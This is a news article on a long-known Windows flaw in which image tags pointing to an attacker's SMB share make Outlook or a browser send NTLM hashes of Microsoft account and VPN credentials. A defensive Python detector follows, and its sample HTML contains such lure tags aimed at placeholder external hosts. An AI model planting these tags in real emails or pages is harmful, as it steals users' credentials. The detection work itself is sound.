
Microsoft Account Passwords, VPN Credentials Leaked Due To Windows Flaw

All Windows versions have a flaw that leaks Microsoft account passwords and VPN credentials

If a Microsoft user browses the Internet over a VPN (virtual private network), there is a chance that the user’s Microsoft account username and password or VPN credentials could be leaked. The cause is believed to be the way Windows handles its old authentication procedures for shared network resources.

The exploit depends on an attacker inserting a link to an SMB resource (network share) inside an email or a Web page that is viewed via Outlook.

The attacker can disguise the link to the network share inside an image tag: in place of a proper image link, the tag points to a share hosted on the attacker’s own network.

When a user opens the link in Internet Explorer, Edge, or Outlook, their computer automatically sends their login credentials, even over the Internet, to authenticate against the criminal’s domain. This happens because of the way Windows manages authentication for network shares.

Even though the Microsoft account password is not leaked in cleartext, researchers demonstrated a long time ago that, as an NTLM hash, it can be easily cracked.

This isn’t even new: Microsoft and the research community have known about this issue since 1997 and have often discussed it at security conferences such as Black Hat.

This was not an issue in the past, as Windows accounts used machine-local usernames and passwords. However, starting with Windows 8, Microsoft began allowing users to log in to their computers with Microsoft accounts. By the time Windows 10 was out, this had become the de facto standard login method, meaning that it was used by more users.

In recent years, Microsoft has begun to tie all its online services to the user’s single Microsoft account. This old attack now allows a crook to obtain credentials for Microsoft accounts, which in turn grants them indirect entry to all kinds of services such as Skype, OneDrive, Xbox, Bing, MSN, Office 365, Azure, and more, says ValdikSS from ProstoVPN.

To make things worse, if the user loads the fraudulent SMB resource over a VPN connection, the user’s VPN credentials are leaked as well. This allows the crook to access the victim’s VPN account.

“Microsoft successfully fixed some issues, some other issues were half-fixed, and other ones are not fixed at all and could be exploited up to this day,” ValdikSS explains. “The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones.”

Users can protect themselves against such attacks by blocking all outgoing SMB connections (port 445) via the Windows firewall, except for local networks, ValdikSS says. However, the best solution against such an attack would be to not use your Microsoft account to log into your Windows PC.
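As an added example (not code from the article or from the researcher), a mail or web content filter can flag image tags whose source is a network share rather than an image URL, and separate local shares from external ones in the same way the firewall exception does. The `\\host\share` and `file://host/share` patterns, the local address ranges, the single-label-name rule and the sample hosts are assumptions of this example.

```python
import ipaddress
import re
from html.parser import HTMLParser

# Image sources that resolve to a network share: \\host\share or file://host/share
_SMB_SRC = re.compile(r'^(?:\\\\|file:(?://|////)(?!/))(?P<host>[^\\/:?#]+)', re.I)
# Ranges treated as "local network" here (RFC 1918, link-local, loopback)
_LOCAL_NETS = [ipaddress.ip_network(n) for n in
               ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                "169.254.0.0/16", "127.0.0.0/8")]

class _ImgSources(HTMLParser):
    """Collects the src attribute of every <img> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.sources += [v.strip() for k, v in attrs if k == "src" and v]

def is_local_host(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Assumption: a single-label name (no dot) only resolves on the local network
        return "." not in host
    return any(ip in net for net in _LOCAL_NETS)

def find_smb_images(html):
    """Return (src, host, 'local' | 'external') for each <img> that points at a share."""
    parser = _ImgSources()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.sources:
        m = _SMB_SRC.match(src)
        if m:
            host = m.group("host")
            findings.append((src, host, "local" if is_local_host(host) else "external"))
    return findings

# Constructed sample message body; hosts and addresses are placeholders
SAMPLE = r'''<p>Newsletter</p>
<img src="https://cdn.example.com/logo.png">
<img src="\\files.example.net\share\pixel.png" width="1">
<img src="file://203.0.113.7/s/a.jpg">
<img src="\\fileserver\public\banner.png">
<img src="file:///C:/Users/Public/pic.png">'''

if __name__ == "__main__":
    for src, host, scope in find_smb_images(SAMPLE):
        print(f"{scope:8} {host:20} {src}")
```

Findings marked `external` are the ones that would send credentials to a share outside the local network; `file:///C:/...` paths are local files and are not reported.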

Kavita Iyer
